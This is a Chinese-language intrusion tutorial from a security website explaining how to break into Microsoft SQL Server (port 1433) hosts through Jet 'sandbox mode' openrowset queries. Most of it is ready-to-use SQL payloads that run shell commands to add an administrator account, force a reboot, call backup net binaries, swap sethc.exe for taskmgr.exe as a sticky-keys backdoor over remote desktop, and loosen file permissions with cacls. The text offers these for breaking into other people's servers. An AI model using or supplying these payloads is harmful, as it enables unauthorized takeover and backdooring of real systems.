首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
1433终极入侵之沙盒模式
来源:vfocus.net 作者:vfocus 发布时间:2011-05-12  

1433好扫,但是难入侵啊!

不是127错误,就是命令被禁用。 不是缺少哪个DLL文件,就是126错误。

哈,甚至连映像劫持、asshell、jobshell、seshell全部都使用不了,甚至SQL语句读写注册表都不行,该如何办?

或许你忽略了一招你们忘记了沙盒模式的威力。其实很多人也知道沙盒模式,但是没有深究。所以忽视了它。

下面我介绍它:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user user pass /add")')

先看这个语句什么意思:意思是用SQL语句执行c:\windows\system32\ias\ias.mdb这个文件,来执行cmd.exe 来添加一个user 的用户。但很多时候cmd被禁用了,所说当你执行这个语句的时候,会显示:无效的调用。

但如果cmd被禁,那接下来该怎么办???

你可以这样去尝试:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net user user pass /add")')

现在没用cmd.exe了 直接利用c:\windows\system32\ias\ias.mdb来调用net 来添加用户。在net.exe没被禁用的情况下,很多的机子是可以添加成功的,接下来

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators user /add")') 就OK了

如果调用net(或net1)成功 ,但是用user用户登陆不了,那你可以重启系统试试语句可以这样写

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("shutdown -r -f -t 0")')

重启以后再添加一次用户。

如果c:\windows\system32下的cmd.exe 、net、 net1都被禁用怎么办?

那你可以尝试调用c:\windows\system32\dllcache\下的 net net1

么SQL语句就可以这么写:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("dllcache\net user user pass /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("dllcache\net localgroup administrators user /add")')

很多情况下,到这里应该执行会成功了,dllcache\下的net net1 一般人不会去禁用。

如果,连dllcache\目录下的net net1都被禁用 用户添加不了 又该怎么办?

························

依照是我 ,我会用c:\windows\system32\ias\ias.mdb 来调用system32下的xcopy.exe来执行命令 ,先说说xcopy是干什么用的 xcopy命令可以用来复制替换文件。

因此我们可以调用xcopy命令 来复制替换掉sethc.exe。

所以SQL语句就可以这么写:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')

这句话的意思是: 通过执行c:\windows\system32\ias\ias.mdb来调用xcopy命令xcopy taskmgr.exe sethc.exe /y 是把system32里的任务管理器替换成粘滞键。

依照我的经验,很多机子是可以替换成功的(前提是sethc.exe不被禁),接下来该怎么做不用我说了3389登陆上去5次shift 则任务管理器就被调出来了任务管理器一调出来 你想做啥都可以了··········那要讲的就到这···思路是活的 我讲了在很多种情况下的对策,但实际你还可能还会遇到其他的情况,不可能全部的情况我都一一讲解对策,不懂的问我。

那如果 sethc.exe 也被禁止 怎么办?

那思路也很简单,我们可以调用cacls.exe来设置权限,把sethc.exe net.exe 设置成everyone都可以完全控制 就可以了,所以就可以这样来写sql语句:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cacls c:\windows\system32\net.exe /e /t /g everyone:F')



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·linux不提权跨目录访问的代码
·微软的“后门”:NTSD.exe,的远
·xss跨站脚本攻击大全
·Xss获取管理员后台地址实战
·XSS(跨站)偷cookie的代码
·Firefox攻击技巧总结
·入侵纽约大学过程
·XSS偷取密码Cookies通用脚本
·Mysql跨库入侵介绍
·XSS漏洞基本攻击代码
·渗透校内网——XSS过程详解
·mysql可多语句执行下不用单引号o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved